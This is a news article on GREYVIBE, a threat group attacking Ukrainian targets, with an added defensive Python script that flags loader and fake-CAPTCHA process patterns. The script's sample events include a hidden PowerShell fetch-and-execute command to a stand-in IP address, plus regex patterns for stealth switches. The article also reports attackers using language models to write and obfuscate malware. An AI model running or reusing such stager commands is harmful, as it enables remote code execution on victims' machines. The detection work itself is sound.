A newly identified cyber espionage group known as GREYVIBE has been linked to sustained and evolving cyberattacks targeting Ukraine and related entities. Researchers report that the group has begun incorporating artificial intelligence tools into its operations to support malware development and campaign execution.
According to cybersecurity firm WithSecure, GREYVIBE has been active since at least August 2025 and is believed to be a Russian-speaking threat actor operating in alignment with broader geopolitical interests tied to the ongoing conflict in Ukraine.
Multiple Attack Vectors Used in Campaigns
Researchers say GREYVIBE has deployed a wide range of delivery techniques to compromise victims across military, government, business, and civilian sectors. These include:
- Spear-phishing emails carrying malicious attachments or links
- Fake CAPTCHA and verification pages designed to trigger malware execution
- Fraudulent websites impersonating Ukrainian organizations and services
- Mobile-focused malware campaigns targeting Android devices
Once inside a system, the group reportedly uses custom-built malware families and loaders designed to maintain persistence and enable remote access.
Malware Families and Intrusion Chains
The group’s operations involve multiple attack chains, each tailored to different delivery methods and platforms.
One campaign, known as PhantomMail, uses phishing emails to distribute compressed files hosted on cloud platforms. These archives contain JavaScript-based loaders that deploy decoy documents while silently installing malware such as PhantomRelay, a PowerShell-based remote access tool.
Another chain, PhantomClick, relies on fake CAPTCHA pages that instruct users to run a command themselves, which starts the infection. PrincessClub operations use fraudulent adult-themed websites to target Ukrainian users with spyware for Android and remote access tools for Windows.
Additional campaigns, including DroneLink and Nebo, use impersonation tactics ranging from charity fronts to fake login pages designed to harvest credentials or deploy spyware.
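The two Windows chains above (a script-host loader unpacked from a downloaded archive, and a command the victim is tricked into running from a fake CAPTCHA page) each leave a recognizable parent/child process pattern on the endpoint. The following is an added triage example written for this page, not code or detection content from WithSecure's report: it runs two heuristic rules over a handful of constructed Sysmon-style process-creation events. The field names, process names, paths, PowerShell switches and the 203.0.113.10 address are the editor's assumptions; the page publishes no indicators and does not describe the loader's launch mechanics, so wscript.exe as the loader's parent and explorer.exe as the parent of a command pasted into the Run dialog are assumed to be typical, not confirmed for GREYVIBE.

```python
"""Heuristic triage of process-creation events for the two Windows chains above.

Added example: the events are constructed for illustration and the rules are the
editor's assumptions, not indicators from WithSecure's GREYVIBE report.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Subset of a Sysmon Event ID 1 style record (field names assumed)."""
    parent_image: str
    parent_cmdline: str
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELL_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# A .js/.jse file launched from a user-writable, archive-extraction-style location.
USER_SCRIPT = re.compile(r"\\(?:Temp|Downloads|Desktop)\\[^\"]*\.jse?\b", re.IGNORECASE)
# PowerShell switches a person typing at a prompt almost never uses, but pasted
# "verification" commands and droppers do: hidden window, encoded command, no profile, policy bypass.
STEALTH_FLAGS = re.compile(
    r"(?:^|\s)-(?:w(?:indowstyle)?\s+h(?:idden)?\b|(?:e|ec|enc|encodedcommand)\b"
    r"|nop(?:rofile)?\b|(?:ep|executionpolicy)\s+bypass)",
    re.IGNORECASE,
)
# Fetch-and-execute idioms that turn a one-liner into a stager.
FETCH_EXEC = re.compile(
    r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer)\b"
    r"|mshta(?:\.exe)?\s+https?://",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the rule names that match one event (empty list means no finding)."""
    tags: list[str] = []
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    # Rule 1 (PhantomMail-like): a script host running a user-dropped .js spawns a shell.
    if parent in SCRIPT_HOSTS and child in SHELL_HOSTS and USER_SCRIPT.search(ev.parent_cmdline):
        tags.append("js_loader_to_shell")
    # Rule 2 (PhantomClick-like): a shell launched straight from explorer.exe (Run dialog,
    # Start search) with stealth switches or a remote fetch. explorer.exe -> powershell.exe
    # alone is normal user behaviour, so a second signal is required.
    if parent == "explorer.exe" and child in SHELL_HOSTS and (
        STEALTH_FLAGS.search(ev.cmdline) or FETCH_EXEC.search(ev.cmdline)
    ):
        tags.append("user_pasted_command")
    return tags


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> matched rules for every event that matched at least one rule."""
    findings: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        tags = classify(ev)
        if tags:
            findings[i] = tags
    return findings


# Constructed sample events (not captured telemetry).
EVENTS = [
    # (0) Loader from an archive: wscript runs a .js extracted to Temp, which starts hidden PowerShell.
    ProcEvent(
        parent_image=r"C:\Windows\System32\wscript.exe",
        parent_cmdline=r'"C:\Windows\System32\wscript.exe" "C:\Users\olena\AppData\Local\Temp\Rar$DIa1.123\Report_2025.pdf.js"',
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        cmdline=r"powershell.exe -nop -w hidden -enc SQBFAFgA",
    ),
    # (1) Fake CAPTCHA: the user pastes the "verification" command into the Run dialog.
    ProcEvent(
        parent_image=r"C:\Windows\explorer.exe",
        parent_cmdline=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        cmdline=r'powershell -w hidden -c "iex (iwr http://203.0.113.10/verify.txt -UseBasicParsing)"',
    ),
    # (2) Benign: the user opens PowerShell from the Start menu.
    ProcEvent(
        parent_image=r"C:\Windows\explorer.exe",
        parent_cmdline=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        cmdline=r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
    ),
    # (3) Benign: a logon script run by the script host from a system path.
    ProcEvent(
        parent_image=r"C:\Windows\System32\wscript.exe",
        parent_cmdline=r'wscript.exe //B "C:\Windows\System32\GroupPolicy\User\Scripts\Logon\map_drives.js"',
        image=r"C:\Windows\System32\cmd.exe",
        cmdline=r"cmd.exe /c net use H: \\fileserver\home",
    ),
]

if __name__ == "__main__":
    for idx, tags in triage(EVENTS).items():
        print(f"event {idx}: {', '.join(tags)}  <- {EVENTS[idx].cmdline}")
```

Both rules deliberately combine a parent/child pair with a content check: on its own, a script host spawning a shell or explorer.exe spawning PowerShell is too common to alert on, while the combination with an archive-extraction path or a hidden/encoded/fetch-and-execute command line is what separates the two constructed malicious events from the two benign ones. On a real estate the paths and switch list would need tuning to local administrative tooling.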
AI Tools Used to Enhance Cyber Operations
According to the researchers, GREYVIBE has incorporated generative AI tools, including large language models, into malware development, code obfuscation, infrastructure setup, and phishing content creation.
Researchers believe AI is helping the group:
- Speed up malware development cycles
- Generate phishing lures and fake websites
- Refactor or modify malicious code to avoid detection
- Reduce reliance on publicly traceable tooling
However, investigators also noted that AI-generated components introduced inconsistencies and design flaws in some malware samples, suggesting a mixed level of operational maturity.
Hybrid Cybercrime-State Connection Under Investigation
WithSecure assesses GREYVIBE as a low-to-moderately sophisticated group with possible links to both state-aligned objectives and the broader Russian cybercriminal ecosystem.
Evidence cited by researchers includes:
- Use of tools associated with known cybercrime groups
- Overlap of malware variants across otherwise unrelated campaigns
- Early-stage malware samples uploaded to public analysis platforms
- Informal naming conventions and development artifacts
- Occasional deployment of cryptocurrency mining software
These factors suggest a hybrid structure where individuals with cybercriminal backgrounds may be operating alongside or in support of state-directed objectives.
Attribution Remains Uncertain
While GREYVIBE’s activity aligns with Russian strategic interests, researchers caution that the group does not fit neatly into traditional categories of either nation-state or cybercriminal operations.
Instead, it appears to operate in a “grey zone,” blending espionage-driven objectives with tools and methods commonly seen in financially motivated cybercrime.
Conclusion
The emergence of GREYVIBE highlights a growing trend in modern cyber warfare: the convergence of artificial intelligence and hybrid threat actors. As AI tools become more accessible, researchers warn that both state-linked and criminal groups may increasingly rely on them to scale attacks, reduce development time, and complicate attribution efforts.